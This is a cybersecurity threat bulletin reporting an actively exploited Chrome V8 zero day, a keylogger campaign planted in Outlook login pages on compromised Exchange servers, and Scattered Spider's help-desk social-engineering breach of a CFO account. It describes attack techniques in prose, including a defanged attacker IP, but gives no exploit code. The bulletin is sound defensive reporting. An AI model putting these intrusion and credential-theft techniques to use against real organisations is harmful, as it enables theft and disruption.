NormCyber Threat Bulletin - 03rd July 2025

On 1 July 2025, Google quietly released an emergency security update addressing a severe zero day flaw in its Chrome browser. Tracked as CVE‑2025‑6554, the vulnerability resides within Chrome’s V8 JavaScript and WebAssembly engine and is categorised as a type confusion error. This flaw allows attackers to manipulate memory allocation using a crafted HTML page, enabling arbitrary code execution with the same privileges as the browser process. The severity of this vulnerability is greatly increased with Google’s confirmation that the vulnerability is actively exploited in the wild, marking it as a zero day that warrants immediate attention.

The vulnerability was discovered by Clément Lecigne of Google’s Threat Analysis Group and was reported on 25^th June 2025. In response, Google deployed a rapid configuration change mitigation on 26 June, applying it across Chrome’s stable channel to stem exploitation. This measure was essentially a stop-gap temporary fix, with a full resolution delivered through urgent version upgrades: Chrome 138.0.7204.96/.97 for Windows, 138.0.7204.92/.93 for macOS, and 138.0.7204.96 for Linux. Google has advised that users upgrade their versions of Chrome to the latest release as soon as possible to mitigate the security risk.

CVE‑2025‑6554 marks the fourth zero day in Chrome actively exploited during 2025—preceded by CVE‑2025‑2783, CVE‑2025‑4664, and CVE‑2025‑5419. This pattern of high‑impact vulnerabilities reflects the browser’s role as an essential user interface and an attack vector for threat actors to target.

The emergence of these vulnerabilities emphasises the strategic importance of robust browser layer defences. Modern threat actors, including criminal groups and nation state groups, increasingly exploit browser flaws for espionage, credential theft, and targeted surveillance. In response, Google continues to refine its security protocols to identify and patch vulnerabilities before they can be exploited.

The proactive posture contrasts with traditional reactive patch cycles. Google’s rapid deployment of configuration level mitigations followed by emergency security updates represents a shift towards the continuous monitoring and quick response frameworks necessary in a world of real time cyber threats, helping to bolster the security of widely used software.

References:
Chrome Zero-Day CVE-2025-6554 Under Active Attack — Google Issues Security Update
NVD – CVE-2025-6554
Chrome Releases: Stable Channel Update for Desktop

Keylogger Malware Targeting Microsoft Exchange Servers

Written by Matthew Johnson, Threat Intelligence Analyst

A recent global campaign, highlighted by security firm Positive Technologies, has revealed that unidentified threat actors have compromised over 70 publicly accessible Microsoft Exchange servers, injecting malicious JavaScript keylogger payloads into Outlook login pages. Two distinct variants were observed: one stores harvested credentials in a publicly reachable local file, while the other transmits data directly to an external server upon user login.

The attack chains involved exploiting known security flaws within Microsoft Exchange Server to insert the keylogger code into the login pages, including the vulnerabilities listed below:

CVE-2014-4078 – IIS Security Feature Bypass Vulnerability
CVE-2020-0796 – Windows SMBv3 Client/Server Remote Code Execution Vulnerability
CVE-2021-31206 – Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2021-31207, CVE-2021-34473, CVE-2021-34523 – Microsoft Exchange Server Security Feature Bypass Vulnerability
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerability

The malware itself masquerades within legitimate login forms, capturing usernames and passwords via XMLHttpRequest calls, then invisibly storing or forwarding them which enables the credentials to be exfiltrated without triggering outbound network alerts.

The ongoing campaign spans at least 65 compromised servers across 26 countries, with confirmed incidents affecting government organisations, IT firms, industrial operators, logistics providers and educational institutions, across multiple countries including Australia, the Netherlands, China and Turkey.

The attackers have employed two main exfiltration techniques. In the first, credentials are saved to a file on the compromised server, which remains accessible from the internet, and in the second variant, the data is immediately transmitted via Telegram bot using coded headers or through DNS tunnelling combined with HTTPS POST requests. Both methods have been designed to evade traditional detection mechanisms, making them even more effective.

This campaign highlights the enduring risk posed by exposed Exchange infrastructure. By leveraging historical vulnerabilities and embedding keyloggers within legitimate login interfaces, attackers have found a quiet yet potent method of harvesting credentials from high-value targets.

References:
Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers
Exchange mutations. Malicious code in Outlook pages

Scattered Spider Targets CFO Account in Four Day Scorched Earth Breach

Written by Matthew Johnson, Threat Intelligence Analyst

Scattered Spider members have recently breached an unnamed organisation by targeting its chief financial officer and using the executive’s privileged access to conduct a “scorched earth” attack. According to research published by ReliaQuest, the threat actor group performed a four day long attack against the organisation in May 2025, beginning with obtaining the CFO’s credentials.

The attack chain began with threat actors obtaining the CFO’s credentials for the organisation’s public facing Oracle Cloud portal for single sign-on (SSO). It is currently unknown how Scattered Spider was able to obtain the creds, but it is noted that they have employed credential harvesters on typo squatted domains and social engineering in the past.

The first day saw multiple attempts from the threat actor group to login to the CFOs Oracle Cloud portal from 159[.]148[.]131[.]196, which subsequently failed due to MFA requirements. This was followed up with on Day 2 with the group contacting the org’s IT help desk under the guise of the CFO to reset the CFO’s MFA and creds on the account, which they succeeded in doing. With access to the compromised account, the attackers performed Entra ID enumeration to identify privileged accounts, as well as SharePoint discovery to locate sensitive files. The Scattered Spider actors were also able to escalate the intrusion by targeting the organisation’s VMware Horizon Virtual Desktop Infrastructure.

On Day 3 of the attack, Scattered Spider actors accessed critical database applications, including the organisation’s Snowflake instances. And having compromised Azure Service Principal identities the previous day, allowing applications to access Azure resources, the attackers then assigned a Global Administrator role to one of the compromised service principal accounts. They were also able to impede the organisation’s IR team by tampering with team member inboxes including intercepting urgent messages relating to the incident.

On Day 4 of the attack, ReliaQuest researchers described a tug of war between the IR team and the threat actors to regain control of the Global Administrator role. The battle ultimately ended with Microsoft intervening and restoring control of the Entra ID tenant to the victim organisation.

According to the report, Scattered Spider members accelerated their threat activity once they knew they had been discovered and engaged in a “scorched-earth approach” against the organisation to cause maximum disruptions. It is worth mentioning that despite the length of the attack, and Scattered Spider’s previous attacks, ransomware was not deployed before the attackers were fully evicted.

References:
Scattered Spider Taps CFO Account in ‘Scorched Earth’ Breach
Scattered Spider Targets Tech Companies for Help-Desk Exploitation – ReliaQuest